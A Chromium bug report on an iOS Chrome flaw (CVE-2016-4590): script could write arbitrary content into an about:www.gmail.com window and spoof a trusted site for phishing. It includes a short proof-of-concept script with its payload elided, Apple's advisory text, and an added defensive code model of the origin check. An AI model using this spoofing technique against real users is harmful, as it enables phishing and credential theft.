Security: Chrome "about-URL" spoofing on IOS
Reported by
xis...@gmail.com,
May 4 2016
Issue description

Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/50.0.2661.95 Mobile/13F68 Safari/601.1.4

DESCRIPTION:
In Chrome, JS script can control the content of about:URL, such as about:gmail.com, about:www.gmail.com. At the same time, it can change the content of the page. An attacker may exploit this vulnerability to spoof an interface of a trusted web site. This vulnerability may aid in phishing-style attacks.

POC:
<script>
payload = "…………";
function pwned() {
  var t = window.open('about:www.gmail.com', 'aaaa');
  t.document.write(atob(payload));
}
</script>
<button onclick="pwned()">GO GO GO</button>

Online Demo: http://xisigr.com/test/about/chrome-about.html

Sep 18 2016
WebKit
Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a malicious website may lead to user interface spoofing
Description: An origin inheritance issue existed in parsing of about: URLs. This was addressed through improved validation of security origins.
CVE-2016-4590 : xisigr of Tencent's Xuanwu Lab (www.tencent.com)
https://support.apple.com/en-hk/HT206902

Oct 2 2016

Dec 9 2016
Security>UX component is deprecated in favor of the Team-Security-UX label

Comment 1 by f...@chromium.org, May 6 2016
Labels: -Restrict-View-SecurityTeam
Mergedinto: 466422
Status: Duplicate (was: Unconfirmed)
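
One way to model the origin check that the Sep 18 2016 comment refers to ("improved validation of security origins"), as an added JavaScript example; it is not Chrome's or WebKit's code. It assumes the HTML Standard rule that a script-opened window inherits its creator's origin only when the URL is about:blank; the helper names and the creator origin used in the samples are hypothetical.

```javascript
// Added illustration, not the browser's implementation.
// Assumed rule (HTML Standard): a window opened by script inherits the
// creator's origin only for about:blank. Every other about: URL, such as
// about:www.gmail.com, must receive an opaque origin the creator cannot script.

const OPAQUE = 'null'; // serialization of an opaque origin

// Hypothetical helper: origin a newly opened browsing context should receive.
function originForNewContext(rawUrl, creatorOrigin) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return OPAQUE; // unparseable input never inherits
  }
  if (url.protocol !== 'about:') {
    return url.origin; // tuple origin for http(s), 'null' for data: etc.
  }
  // The WHATWG URL parser keeps the text after "about:" in pathname and the
  // query and fragment separately, so about:blank#x still has pathname "blank".
  return url.pathname === 'blank' ? creatorOrigin : OPAQUE;
}

// Hypothetical helper: may the creator call document.write() on the new window?
function creatorMayScript(rawUrl, creatorOrigin) {
  const origin = originForNewContext(rawUrl, creatorOrigin);
  return origin !== OPAQUE && origin === creatorOrigin;
}

// Constructed samples: the two about: URLs named in the report plus controls.
function classifySamples(creatorOrigin) {
  const samples = [
    'about:blank',
    'about:blank#x',
    'about:gmail.com',
    'about:www.gmail.com',
    'https://www.gmail.com/',
  ];
  return samples.map((u) => ({
    url: u,
    origin: originForNewContext(u, creatorOrigin),
    scriptable: creatorMayScript(u, creatorOrigin),
  }));
}

console.table(classifySamples('http://xisigr.com'));
```

Under this model the report's about:www.gmail.com window gets an opaque origin, so the opener's document.write() call would be a cross-origin access and be refused.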